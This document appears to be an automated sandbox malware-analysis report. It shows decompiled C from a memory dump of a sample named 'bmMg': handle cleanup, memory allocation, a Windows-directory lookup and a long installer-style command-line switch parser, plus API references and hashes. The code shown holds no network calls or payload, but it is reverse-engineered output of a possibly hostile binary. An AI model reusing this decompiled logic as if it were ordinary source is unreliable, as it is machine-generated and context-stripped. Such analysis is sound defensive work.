                                                                      0x00f865ba
                                                                      0x00f865c3
                                                                      0x00f865c5
                                                                      0x00f865c8
                                                                      0x00f865c8
                                                                      0x00f865c3
                                                                      0x00f865c9
                                                                      0x00f865cc
                                                                      0x00f865d2
                                                                      0x00f865d1
                                                                      0x00f865d1
                                                                      0x00000000
                                                                      0x00f865dc
                                                                      0x00000000

                                                                      APIs
                                                                      • CharPrevA.USER32(00F88B3E,00F88B3F,00000001,00F88B3E,-00000003,?,00F860EC,00F81140,?), ref: 00F865BA
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: CharPrev
                                                                      • String ID:
                                                                      • API String ID: 122130370-0
                                                                      • Opcode ID: 557e86bcc19b9ae9e63ee8eb139104066e5359afce97b1bab91ecca7fedbbf3e
                                                                      • Instruction ID: c6337546023b03c89c79c784f38b635b51d11465c4c9719c5a25ade792e98a6b
                                                                      • Opcode Fuzzy Hash: 557e86bcc19b9ae9e63ee8eb139104066e5359afce97b1bab91ecca7fedbbf3e
                                                                      • Instruction Fuzzy Hash: F1F04C335042509BD331291D9884BF6BFDEDB86360F2C016EF8DACB205DA658C46A3A0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 93%
                                                                      			E00F8621E() {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				signed int _t5;
                                                                      				void* _t9;
                                                                      				void* _t13;
                                                                      				void* _t19;
                                                                      				void* _t20;
                                                                      				signed int _t21;
                                                                      
                                                                      				_t5 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t5 ^ _t21;
                                                                      				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                      					0x4f0 = 2;
                                                                      					_t9 = E00F8597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                      				} else {
                                                                      					E00F844B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                      					 *0xf89124 = E00F86285();
                                                                      					_t9 = 0;
                                                                      				}
                                                                      				return E00F86CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                      			}











                                                                      0x00f86229
                                                                      0x00f86230
                                                                      0x00f86247
                                                                      0x00f8626a
                                                                      0x00f86272
                                                                      0x00f86249
                                                                      0x00f86255
                                                                      0x00f8625f
                                                                      0x00f86264
                                                                      0x00f86264
                                                                      0x00f86284

                                                                      APIs
                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00F8623F
                                                                        • Part of subcall function 00F844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F84518
                                                                        • Part of subcall function 00F844B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00F84554
                                                                        • Part of subcall function 00F86285: GetLastError.KERNEL32(00F85BBC), ref: 00F86285
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                      • String ID:
                                                                      • API String ID: 381621628-0
                                                                      • Opcode ID: b2a0d24026078d680fa0ee4823844cca5749e6aee68ee81940a9dc265bc58817
                                                                      • Instruction ID: 48bf8b38bb1ee1e9294c63d40cfbfc9435cea2e0aa12b4b58f00933a0f441f48
                                                                      • Opcode Fuzzy Hash: b2a0d24026078d680fa0ee4823844cca5749e6aee68ee81940a9dc265bc58817
                                                                      • Instruction Fuzzy Hash: 1EF082B1744208ABEB50FF749D06FFE77ACDB54700F4004AAB986DA191ED789D44A750
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00F84B60(signed int _a4) {
                                                                      				signed int _t9;
                                                                      				signed int _t15;
                                                                      
                                                                      				_t15 = _a4 * 0x18;
                                                                      				if( *((intOrPtr*)(_t15 + 0xf88d64)) != 1) {
                                                                      					_t9 = FindCloseChangeNotification( *(_t15 + 0xf88d74)); // executed
                                                                      					if(_t9 == 0) {
                                                                      						return _t9 | 0xffffffff;
                                                                      					}
                                                                      					 *((intOrPtr*)(_t15 + 0xf88d60)) = 1;
                                                                      					return 0;
                                                                      				}
                                                                      				 *((intOrPtr*)(_t15 + 0xf88d60)) = 1;
                                                                      				 *((intOrPtr*)(_t15 + 0xf88d68)) = 0;
                                                                      				 *((intOrPtr*)(_t15 + 0xf88d70)) = 0;
                                                                      				 *((intOrPtr*)(_t15 + 0xf88d6c)) = 0;
                                                                      				return 0;
                                                                      			}





                                                                      0x00f84b66
                                                                      0x00f84b74
                                                                      0x00f84b98
                                                                      0x00f84ba0
                                                                      0x00000000
                                                                      0x00f84bac
                                                                      0x00f84ba4
                                                                      0x00000000
                                                                      0x00f84ba4
                                                                      0x00f84b78
                                                                      0x00f84b7e
                                                                      0x00f84b84
                                                                      0x00f84b8a
                                                                      0x00000000

                                                                      APIs
                                                                      • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00F84FA1,00000000), ref: 00F84B98
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: ChangeCloseFindNotification
                                                                      • String ID:
                                                                      • API String ID: 2591292051-0
                                                                      • Opcode ID: d1cfb9609e057179b18baa7727f77f7144c6e45b0416605691bb80c0c994a52e
                                                                      • Instruction ID: 65394b9ebd2cb5263d3f6b7a779efc780a38a34a9a7aca0aebe99d9ce0dcf97a
                                                                      • Opcode Fuzzy Hash: d1cfb9609e057179b18baa7727f77f7144c6e45b0416605691bb80c0c994a52e
                                                                      • Instruction Fuzzy Hash: E6F01932D40B099E8772DF79CC016D2BBE4EAD53E0350092EA46ED2191EB30A542FBD0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00F866AE(CHAR* __ecx) {
                                                                      				unsigned int _t1;
                                                                      
                                                                      				_t1 = GetFileAttributesA(__ecx); // executed
                                                                      				if(_t1 != 0xffffffff) {
                                                                      					return  !(_t1 >> 4) & 0x00000001;
                                                                      				} else {
                                                                      					return 0;
                                                                      				}
                                                                      			}




                                                                      0x00f866b1
                                                                      0x00f866ba
                                                                      0x00f866c7
                                                                      0x00f866bc
                                                                      0x00f866be
                                                                      0x00f866be

                                                                      APIs
                                                                      • GetFileAttributesA.KERNELBASE(?,00F84777,?,00F84E38,?), ref: 00F866B1
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: 4a882d498f73a73c30f3b3f7841c692236e43da224ee1421fee2580fde95b9fa
                                                                      • Instruction ID: f8394646367cd87c14a98acb2c54106737f66a7db714fdeb3e836cd0e731b044
                                                                      • Opcode Fuzzy Hash: 4a882d498f73a73c30f3b3f7841c692236e43da224ee1421fee2580fde95b9fa
                                                                      • Instruction Fuzzy Hash: C7B09276622484426A2016316C295A63841F6C123A7E41B91F032C01E0DA3EC846E204
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00F84CA0(long _a4) {
                                                                      				void* _t2;
                                                                      
                                                                      				_t2 = GlobalAlloc(0, _a4); // executed
                                                                      				return _t2;
                                                                      			}




                                                                      0x00f84caa
                                                                      0x00f84cb1

                                                                      APIs
                                                                      • GlobalAlloc.KERNELBASE(00000000,?), ref: 00F84CAA
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: AllocGlobal
                                                                      • String ID:
                                                                      • API String ID: 3761449716-0
                                                                      • Opcode ID: d111df0f163a4943a9a33bd17f7f1068d309b910c6c0aaaba0c052e0c28cb58d
                                                                      • Instruction ID: 76b02aa4ffab6dc0fcd00c1c33d622c7b0d824558ee42fac5c8d1a0ba3af19f2
                                                                      • Opcode Fuzzy Hash: d111df0f163a4943a9a33bd17f7f1068d309b910c6c0aaaba0c052e0c28cb58d
                                                                      • Instruction Fuzzy Hash: 7DB0123214420CB7DF001FC2EC09FD53F1DE7C4761F240041F60C450508A7294109796
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00F84CC0(void* _a4) {
                                                                      				void* _t2;
                                                                      
                                                                      				_t2 = GlobalFree(_a4); // executed
                                                                      				return _t2;
                                                                      			}




                                                                      0x00f84cc8
                                                                      0x00f84ccf

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: FreeGlobal
                                                                      • String ID:
                                                                      • API String ID: 2979337801-0
                                                                      • Opcode ID: 821e44d9dcacae2e35d4cd69b95fea99c3e0892e2bb25ab91cc93a2dcb048d54
                                                                      • Instruction ID: 4d5319bb4e46c9206b2b26146e1d0db56b6b5eaa1c9cfe98547632b1404dd396
                                                                      • Opcode Fuzzy Hash: 821e44d9dcacae2e35d4cd69b95fea99c3e0892e2bb25ab91cc93a2dcb048d54
                                                                      • Instruction Fuzzy Hash: 62B0123100010CB78F001B42EC088953F1DD6C02607000051F50C451218B3398119685
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 92%
                                                                      			E00F85C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				CHAR* _v265;
                                                                      				char _v266;
                                                                      				char _v267;
                                                                      				char _v268;
                                                                      				CHAR* _v272;
                                                                      				char _v276;
                                                                      				signed int _v296;
                                                                      				char _v556;
                                                                      				signed int _t61;
                                                                      				int _t63;
                                                                      				char _t67;
                                                                      				CHAR* _t69;
                                                                      				signed int _t71;
                                                                      				void* _t75;
                                                                      				char _t79;
                                                                      				void* _t83;
                                                                      				void* _t85;
                                                                      				void* _t87;
                                                                      				intOrPtr _t88;
                                                                      				void* _t100;
                                                                      				intOrPtr _t101;
                                                                      				CHAR* _t104;
                                                                      				intOrPtr _t105;
                                                                      				void* _t111;
                                                                      				void* _t115;
                                                                      				CHAR* _t118;
                                                                      				void* _t119;
                                                                      				void* _t127;
                                                                      				CHAR* _t129;
                                                                      				void* _t132;
                                                                      				void* _t142;
                                                                      				signed int _t143;
                                                                      				CHAR* _t144;
                                                                      				void* _t145;
                                                                      				void* _t146;
                                                                      				void* _t147;
                                                                      				void* _t149;
                                                                      				char _t155;
                                                                      				void* _t157;
                                                                      				void* _t162;
                                                                      				void* _t163;
                                                                      				char _t167;
                                                                      				char _t170;
                                                                      				CHAR* _t173;
                                                                      				void* _t177;
                                                                      				intOrPtr* _t183;
                                                                      				intOrPtr* _t192;
                                                                      				CHAR* _t199;
                                                                      				void* _t200;
                                                                      				CHAR* _t201;
                                                                      				void* _t205;
                                                                      				void* _t206;
                                                                      				int _t209;
                                                                      				void* _t210;
                                                                      				void* _t212;
                                                                      				void* _t213;
                                                                      				CHAR* _t218;
                                                                      				intOrPtr* _t219;
                                                                      				intOrPtr* _t220;
                                                                      				signed int _t221;
                                                                      				signed int _t223;
                                                                      
                                                                      				_t173 = __ecx;
                                                                      				_t61 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t61 ^ _t221;
                                                                      				_push(__ebx);
                                                                      				_push(__esi);
                                                                      				_push(__edi);
                                                                      				_t209 = 1;
                                                                      				if(__ecx == 0 ||  *__ecx == 0) {
                                                                      					_t63 = 1;
                                                                      				} else {
                                                                      					L2:
                                                                      					while(_t209 != 0) {
                                                                      						_t67 =  *_t173;
                                                                      						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                      							_t173 = CharNextA(_t173);
                                                                      							continue;
                                                                      						}
                                                                      						_v272 = _t173;
                                                                      						if(_t67 == 0) {
                                                                      							break;
                                                                      						} else {
                                                                      							_t69 = _v272;
                                                                      							_t177 = 0;
                                                                      							_t213 = 0;
                                                                      							_t163 = 0;
                                                                      							_t202 = 1;
                                                                      							do {
                                                                      								if(_t213 != 0) {
                                                                      									if(_t163 != 0) {
                                                                      										break;
                                                                      									} else {
                                                                      										goto L21;
                                                                      									}
                                                                      								} else {
                                                                      									_t69 =  *_t69;
                                                                      									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                      										break;
                                                                      									} else {
                                                                      										_t69 = _v272;
                                                                      										L21:
                                                                      										_t155 =  *_t69;
                                                                      										if(_t155 != 0x22) {
                                                                      											if(_t202 >= 0x104) {
                                                                      												goto L106;
                                                                      											} else {
                                                                      												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                      												_t177 = _t177 + 1;
                                                                      												_t202 = _t202 + 1;
                                                                      												_t157 = 1;
                                                                      												goto L30;
                                                                      											}
                                                                      										} else {
                                                                      											if(_v272[1] == 0x22) {
                                                                      												if(_t202 >= 0x104) {
                                                                      													L106:
                                                                      													_t63 = 0;
                                                                      													L125:
                                                                      													_pop(_t210);
                                                                      													_pop(_t212);
                                                                      													_pop(_t162);
                                                                      													return E00F86CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                      												} else {
                                                                      													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                      													_t177 = _t177 + 1;
                                                                      													_t202 = _t202 + 1;
                                                                      													_t157 = 2;
                                                                      													goto L30;
                                                                      												}
                                                                      											} else {
                                                                      												_t157 = 1;
                                                                      												if(_t213 != 0) {
                                                                      													_t163 = 1;
                                                                      												} else {
                                                                      													_t213 = 1;
                                                                      												}
                                                                      												goto L30;
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      								goto L131;
                                                                      								L30:
                                                                      								_v272 =  &(_v272[_t157]);
                                                                      								_t69 = _v272;
                                                                      							} while ( *_t69 != 0);
                                                                      							if(_t177 >= 0x104) {
                                                                      								E00F86E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                      								asm("int3");
                                                                      								_push(_t221);
                                                                      								_t222 = _t223;
                                                                      								_t71 =  *0xf88004; // 0x644c7055
                                                                      								_v296 = _t71 ^ _t223;
                                                                      								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                      									0x4f0 = 2;
                                                                      									_t75 = E00F8597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                      								} else {
                                                                      									E00F844B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                      									 *0xf89124 = E00F86285();
                                                                      									_t75 = 0;
                                                                      								}
                                                                      								return E00F86CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                      							} else {
                                                                      								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                      								if(_t213 == 0) {
                                                                      									if(_t163 != 0) {
                                                                      										goto L34;
                                                                      									} else {
                                                                      										goto L40;
                                                                      									}
                                                                      								} else {
                                                                      									if(_t163 != 0) {
                                                                      										L40:
                                                                      										_t79 = _v268;
                                                                      										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                      											_t83 = CharUpperA(_v267) - 0x3f;
                                                                      											if(_t83 == 0) {
                                                                      												_t202 = 0x521;
                                                                      												E00F844B9(0, 0x521, 0xf81140, 0, 0x40, 0);
                                                                      												_t85 =  *0xf88588; // 0x0
                                                                      												if(_t85 != 0) {
                                                                      													CloseHandle(_t85);
                                                                      												}
                                                                      												ExitProcess(0);
                                                                      											}
                                                                      											_t87 = _t83 - 4;
                                                                      											if(_t87 == 0) {
                                                                      												if(_v266 != 0) {
                                                                      													if(_v266 != 0x3a) {
                                                                      														goto L49;
                                                                      													} else {
                                                                      														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                      														_t215 =  &_v268 + _t167;
                                                                      														_t183 =  &_v268 + _t167;
                                                                      														_t50 = _t183 + 1; // 0x1
                                                                      														_t202 = _t50;
                                                                      														do {
                                                                      															_t88 =  *_t183;
                                                                      															_t183 = _t183 + 1;
                                                                      														} while (_t88 != 0);
                                                                      														if(_t183 == _t202) {
                                                                      															goto L49;
                                                                      														} else {
                                                                      															_t205 = 0x5b;
                                                                      															if(E00F8667F(_t215, _t205) == 0) {
                                                                      																L115:
                                                                      																_t206 = 0x5d;
                                                                      																if(E00F8667F(_t215, _t206) == 0) {
                                                                      																	L117:
                                                                      																	_t202 =  &_v276;
                                                                      																	_v276 = _t167;
                                                                      																	if(E00F85C17(_t215,  &_v276) == 0) {
                                                                      																		goto L49;
                                                                      																	} else {
                                                                      																		_t202 = 0x104;
                                                                      																		E00F81680(0xf88c42, 0x104, _v276 + _t167 +  &_v268);
                                                                      																	}
                                                                      																} else {
                                                                      																	_t202 = 0x5b;
                                                                      																	if(E00F8667F(_t215, _t202) == 0) {
                                                                      																		goto L49;
                                                                      																	} else {
                                                                      																		goto L117;
                                                                      																	}
                                                                      																}
                                                                      															} else {
                                                                      																_t202 = 0x5d;
                                                                      																if(E00F8667F(_t215, _t202) == 0) {
                                                                      																	goto L49;
                                                                      																} else {
                                                                      																	goto L115;
                                                                      																}
                                                                      															}
                                                                      														}
                                                                      													}
                                                                      												} else {
                                                                      													 *0xf88a24 = 1;
                                                                      												}
                                                                      												goto L50;
                                                                      											} else {
                                                                      												_t100 = _t87 - 1;
                                                                      												if(_t100 == 0) {
                                                                      													L98:
                                                                      													if(_v266 != 0x3a) {
                                                                      														goto L49;
                                                                      													} else {
                                                                      														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                      														_t217 =  &_v268 + _t170;
                                                                      														_t192 =  &_v268 + _t170;
                                                                      														_t38 = _t192 + 1; // 0x1
                                                                      														_t202 = _t38;
                                                                      														do {
                                                                      															_t101 =  *_t192;
                                                                      															_t192 = _t192 + 1;
                                                                      														} while (_t101 != 0);
                                                                      														if(_t192 == _t202) {
                                                                      															goto L49;
                                                                      														} else {
                                                                      															_t202 =  &_v276;
                                                                      															_v276 = _t170;
                                                                      															if(E00F85C17(_t217,  &_v276) == 0) {
                                                                      																goto L49;
                                                                      															} else {
                                                                      																_t104 = CharUpperA(_v267);
                                                                      																_t218 = 0xf88b3e;
                                                                      																_t105 = _v276;
                                                                      																if(_t104 != 0x54) {
                                                                      																	_t218 = 0xf88a3a;
                                                                      																}
                                                                      																E00F81680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                      																_t202 = 0x104;
                                                                      																E00F8658A(_t218, 0x104, 0xf81140);
                                                                      																if(E00F831E0(_t218) != 0) {
                                                                      																	goto L50;
                                                                      																} else {
                                                                      																	goto L106;
                                                                      																}
                                                                      															}
                                                                      														}
                                                                      													}
                                                                      												} else {
                                                                      													_t111 = _t100 - 0xa;
                                                                      													if(_t111 == 0) {
                                                                      														if(_v266 != 0) {
                                                                      															if(_v266 != 0x3a) {
                                                                      																goto L49;
                                                                      															} else {
                                                                      																_t199 = _v265;
                                                                      																if(_t199 != 0) {
                                                                      																	_t219 =  &_v265;
                                                                      																	do {
                                                                      																		_t219 = _t219 + 1;
                                                                      																		_t115 = CharUpperA(_t199) - 0x45;
                                                                      																		if(_t115 == 0) {
                                                                      																			 *0xf88a2c = 1;
                                                                      																		} else {
                                                                      																			_t200 = 2;
                                                                      																			_t119 = _t115 - _t200;
                                                                      																			if(_t119 == 0) {
                                                                      																				 *0xf88a30 = 1;
                                                                      																			} else {
                                                                      																				if(_t119 == 0xf) {
                                                                      																					 *0xf88a34 = 1;
                                                                      																				} else {
                                                                      																					_t209 = 0;
                                                                      																				}
                                                                      																			}
                                                                      																		}
                                                                      																		_t118 =  *_t219;
                                                                      																		_t199 = _t118;
                                                                      																	} while (_t118 != 0);
                                                                      																}
                                                                      															}
                                                                      														} else {
                                                                      															 *0xf88a2c = 1;
                                                                      														}
                                                                      														goto L50;
                                                                      													} else {
                                                                      														_t127 = _t111 - 3;
                                                                      														if(_t127 == 0) {
                                                                      															if(_v266 != 0) {
                                                                      																if(_v266 != 0x3a) {
                                                                      																	goto L49;
                                                                      																} else {
                                                                      																	_t129 = CharUpperA(_v265);
                                                                      																	if(_t129 == 0x31) {
                                                                      																		goto L76;
                                                                      																	} else {
                                                                      																		if(_t129 == 0x41) {
                                                                      																			goto L83;
                                                                      																		} else {
                                                                      																			if(_t129 == 0x55) {
                                                                      																				goto L76;
                                                                      																			} else {
                                                                      																				goto L49;
                                                                      																			}
                                                                      																		}
                                                                      																	}
                                                                      																}
                                                                      															} else {
                                                                      																L76:
                                                                      																_push(2);
                                                                      																_pop(1);
                                                                      																L83:
                                                                      																 *0xf88a38 = 1;
                                                                      															}
                                                                      															goto L50;
                                                                      														} else {
                                                                      															_t132 = _t127 - 1;
                                                                      															if(_t132 == 0) {
                                                                      																if(_v266 != 0) {
                                                                      																	if(_v266 != 0x3a) {
                                                                      																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                      																			goto L49;
                                                                      																		}
                                                                      																	} else {
                                                                      																		_t201 = _v265;
                                                                      																		 *0xf89a2c = 1;
                                                                      																		if(_t201 != 0) {
                                                                      																			_t220 =  &_v265;
                                                                      																			do {
                                                                      																				_t220 = _t220 + 1;
                                                                      																				_t142 = CharUpperA(_t201) - 0x41;
                                                                      																				if(_t142 == 0) {
                                                                      																					_t143 = 2;
                                                                      																					 *0xf89a2c =  *0xf89a2c | _t143;
                                                                      																					goto L70;
                                                                      																				} else {
                                                                      																					_t145 = _t142 - 3;
                                                                      																					if(_t145 == 0) {
                                                                      																						 *0xf88d48 =  *0xf88d48 | 0x00000040;
                                                                      																					} else {
                                                                      																						_t146 = _t145 - 5;
                                                                      																						if(_t146 == 0) {
                                                                      																							 *0xf89a2c =  *0xf89a2c & 0xfffffffd;
                                                                      																							goto L70;
                                                                      																						} else {
                                                                      																							_t147 = _t146 - 5;
                                                                      																							if(_t147 == 0) {
                                                                      																								 *0xf89a2c =  *0xf89a2c & 0xfffffffe;
                                                                      																								goto L70;
                                                                      																							} else {
                                                                      																								_t149 = _t147;
                                                                      																								if(_t149 == 0) {
                                                                      																									 *0xf88d48 =  *0xf88d48 | 0x00000080;
                                                                      																								} else {
                                                                      																									if(_t149 == 3) {
                                                                      																										 *0xf89a2c =  *0xf89a2c | 0x00000004;
                                                                      																										L70:
                                                                      																										 *0xf88a28 = 1;
                                                                      																									} else {
                                                                      																										_t209 = 0;
                                                                      																									}
                                                                      																								}
                                                                      																							}
                                                                      																						}
                                                                      																					}
                                                                      																				}
                                                                      																				_t144 =  *_t220;
                                                                      																				_t201 = _t144;
                                                                      																			} while (_t144 != 0);
                                                                      																		}
                                                                      																	}
                                                                      																} else {
                                                                      																	 *0xf89a2c = 3;
                                                                      																	 *0xf88a28 = 1;
                                                                      																}
                                                                      																goto L50;
                                                                      															} else {
                                                                      																if(_t132 == 0) {
                                                                      																	goto L98;
                                                                      																} else {
                                                                      																	L49:
                                                                      																	_t209 = 0;
                                                                      																	L50:
                                                                      																	_t173 = _v272;
                                                                      																	if( *_t173 != 0) {
                                                                      																		goto L2;
                                                                      																	} else {
                                                                      																		break;
                                                                      																	}
                                                                      																}
                                                                      															}
                                                                      														}
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      										} else {
                                                                      											goto L106;
                                                                      										}
                                                                      									} else {
                                                                      										L34:
                                                                      										_t209 = 0;
                                                                      										break;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						goto L131;
                                                                      					}
                                                                      					if( *0xf88a2c != 0 &&  *0xf88b3e == 0) {
                                                                      						if(GetModuleFileNameA( *0xf89a3c, 0xf88b3e, 0x104) == 0) {
                                                                      							_t209 = 0;
                                                                      						} else {
                                                                      							_t202 = 0x5c;
                                                                      							 *((char*)(E00F866C8(0xf88b3e, _t202) + 1)) = 0;
                                                                      						}
                                                                      					}
                                                                      					_t63 = _t209;
                                                                      				}
                                                                      				L131:
                                                                      			}


































































                                                                      0x00f85c9e
                                                                      0x00f85ca9
                                                                      0x00f85cb0
                                                                      0x00f85cb3
                                                                      0x00f85cb6
                                                                      0x00f85cb7
                                                                      0x00f85cb8
                                                                      0x00f85cbd
                                                                      0x00f86204
                                                                      0x00f85ccb
                                                                      0x00000000
                                                                      0x00f85ccb
                                                                      0x00f85cd3
                                                                      0x00f85cd7
                                                                      0x00f85cf4
                                                                      0x00000000
                                                                      0x00f85cf4
                                                                      0x00f85cf8
                                                                      0x00f85d00
                                                                      0x00000000
                                                                      0x00f85d06
                                                                      0x00f85d06
                                                                      0x00f85d0e
                                                                      0x00f85d10
                                                                      0x00f85d12
                                                                      0x00f85d14
                                                                      0x00f85d15
                                                                      0x00f85d17
                                                                      0x00f85d49
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f85d19
                                                                      0x00f85d19
                                                                      0x00f85d1d
                                                                      0x00000000
                                                                      0x00f85d3f
                                                                      0x00f85d3f
                                                                      0x00f85d4b
                                                                      0x00f85d4b
                                                                      0x00f85d4f
                                                                      0x00f85d8d
                                                                      0x00000000
                                                                      0x00f85d93
                                                                      0x00f85d93
                                                                      0x00f85d9a
                                                                      0x00f85d9d
                                                                      0x00f85d9e
                                                                      0x00000000
                                                                      0x00f85d9e
                                                                      0x00f85d51
                                                                      0x00f85d5b
                                                                      0x00f85d72
                                                                      0x00f860fb
                                                                      0x00f860fb
                                                                      0x00f86207
                                                                      0x00f8620a
                                                                      0x00f8620b
                                                                      0x00f8620e
                                                                      0x00f86217
                                                                      0x00f85d78
                                                                      0x00f85d78
                                                                      0x00f85d80
                                                                      0x00f85d83
                                                                      0x00f85d84
                                                                      0x00000000
                                                                      0x00f85d84
                                                                      0x00f85d5d
                                                                      0x00f85d5f
                                                                      0x00f85d62
                                                                      0x00f85d68
                                                                      0x00f85d64
                                                                      0x00f85d64
                                                                      0x00f85d64
